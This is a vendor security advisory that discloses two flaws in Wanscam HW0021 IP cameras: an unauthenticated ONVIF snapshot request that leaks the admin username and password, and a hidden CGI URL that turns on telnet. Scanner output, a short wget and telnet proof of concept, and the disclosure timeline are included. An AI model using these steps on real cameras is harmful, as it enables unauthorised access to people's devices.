Facebook Google Plus Twitter LinkedIn YouTube RSS Menu Search Resource - BlogResource - WebinarResource - ReportResource - Eventicons_066 icons_067icons_068icons_069icons_070

[R1] Wanscam Network Camera Multiple Vulnerabiltiies

Medium

Synopsis

While investigating Pierre Kim's disclosure, Multiple vulnerabilities found in Wireless IP Camera (P2P) WIFICAM cameras and vulnerabilities in custom http server, Tenable came across a couple of vulnerabilities in Wanscam's HW0021 network camera. These vulnerabilities sound similar to a couple of vulnerabilities FSecure encountered in Foscam devices. Its unclear to Tenable how Foscam and Wanscam are related.

CVE-2017-11510: Administrator Username and Password Disclosure

The ONVIF protocol supports a method called GetSnapshotUri. This method returns a URL that links to the most recent camera snapshot. When the HW0021 replies to a remote unauthenticated user's GetSnapshotUri request it responds with a URL that includes the admin username and password. Here is an example from Nessus' ONVIF implementation:
LobsterTrap:plugin_dev albinolobster$ /Library/Nessus/run/bin/nasl -aWMXr -t 192.168.1.178 ./onvif_get_snapshot.nasl 
----------[ Executing onvif_detect.nbin ]------

The ONVIF service listening on UDP port 3702 advertises
the following information:

Endpoint: http://192.168.1.178:8080/onvif/devices
Name: IPCAM
Model: C6F0SeZ0N0P0L0

audit-trail:success: The service listening on port 3702 has already been identified.
----------[ Finished onvif_detect.nbin ]------
----------[ Executing onvif_get_endpoints.nasl ]------
The ONVIF server on port 8080 supports these services:

http://www.onvif.org/ver20/analytics/wsdl => http://192.168.1.178:8080/onvif/analytics
http://www.onvif.org/ver10/events/wsdl => http://192.168.1.178:8080/onvif/events
http://www.onvif.org/ver10/device/wsdl => http://192.168.1.178:8080/onvif/devices
http://www.onvif.org/ver20/imaging/wsdl => http://192.168.1.178:8080/onvif/imaging
http://www.onvif.org/ver20/ptz/wsdl => http://192.168.1.178:8080/onvif/ptz
http://www.onvif.org/ver10/media/wsdl => http://192.168.1.178:8080/onvif/media

----------[ Finished onvif_get_endpoints.nasl ]------
----------[ Executing ./onvif_get_snapshot.nasl ]------

It was possible to obtain a screenshot from the following URL
on the remote camera: 

http://192.168.1.178:80/web/auto.jpg?-usr=admin&-pwd=cheesedoodle&

----------[ Finished ./onvif_get_snapshot.nasl ]------
You can see the username (admin) and password (cheesedoodle) in the final plugin.

Hidden Telnet Functionality

Telnet is not enabled by default on the device. However, if an authenticated user visits /web/cgi-bin/hi3510/printscreenrequest.cgi then telnetd starts up.
[email protected]:~$ telnet 192.168.1.178
Trying 192.168.1.178...
telnet: Unable to connect to remote host: Connection refused
[email protected]:~$ wget --user admin --password labpass1 http://192.168.1.178/web/cgi-bin/hi3510/printscreenrequest.cgi &> /dev/null
[email protected]:~$ telnet 192.168.1.178
Trying 192.168.1.178...
Connected to 192.168.1.178.
Escape character is '^]'.

IPCamera login: 

Solution

A patch has not been published.

Disclosure Timeline

08/01/17 - Reached out to [email protected] for appropriate security related contact
08/03/17 - Lacking a response, attempted to establish communication via [email protected] [email protected] [email protected] and [email protected]
08/04/17 - Response from support asking me to fill out word document.
08/04/17 - Tenable not certain support understands. Tenable sends the disclosure information to clear things up.
08/06/17 - Support asks for a picture of the camera
08/06/17 - Tenable responds with a link to the camera on their website: http://www.wanscam.com/productshow-7-56-1.html - Somewhat concerned that they ignored the disclosure
08/08/17 - Support informs Tenable that we can change the username/password in the user settings
08/08/17 - Tenables responds that we understand that but the system will still provide an unauthenticated user with the changed credentials
08/08/17 - Support replies with a confusing message. Lost in translation we think.
08/08/17 - Tenable reminds them that we sent PoC of the vulns.
08/09/17 - Support says they've never come across these issues
08/16/17 - Tenable asks them to confirm if they tried the proof of concepts
08/17/17 - Support tells Tenable that you can change the password and dev says there is no telnet functionality
08/17/17 - Tenable reminds support that it doesn't matter if the password is changed and we've provided proof there is telnet functionality. We are kind of going in circles here.
11/10/17 - Advisory published

All information within TRA advisories is provided “as is”, without warranty of any kind, including the implied warranties of merchantability and fitness for a particular purpose, and with no guarantee of completeness, accuracy, or timeliness. Individuals and organizations are responsible for assessing the impact of any actual or potential security vulnerability.

Tenable takes product security very seriously. If you believe you have found a vulnerability in one of our products, we ask that you please work with us to quickly resolve it in order to protect customers. Tenable believes in responding quickly to such reports, maintaining communication with researchers, and providing a solution in short order.

For more details on submitting vulnerability information, please see our Vulnerability Reporting Guidelines page.

If you have questions or corrections about this advisory, please email [email protected]

Try for Free Buy Now

Try Tenable.io Vulnerability Management

FREE FOR 60 DAYS

Enjoy full access to a modern, cloud-based vulnerability management platform that enables you to see and track all of your assets with unmatched accuracy. Sign up now and run your first scan within 60 seconds.

Buy Tenable.io Vulnerability Management

Enjoy full access to a modern, cloud-based vulnerability management platform that enables you to see and track all of your assets with unmatched accuracy. Purchase your annual subscription today.

65 assets

Try Nessus Professional Free

FREE FOR 7 DAYS

Nessus® is the most comprehensive vulnerability scanner on the market today. Nessus Professional will help automate the vulnerability scanning process, save time in your compliance cycles and allow you to engage your IT team.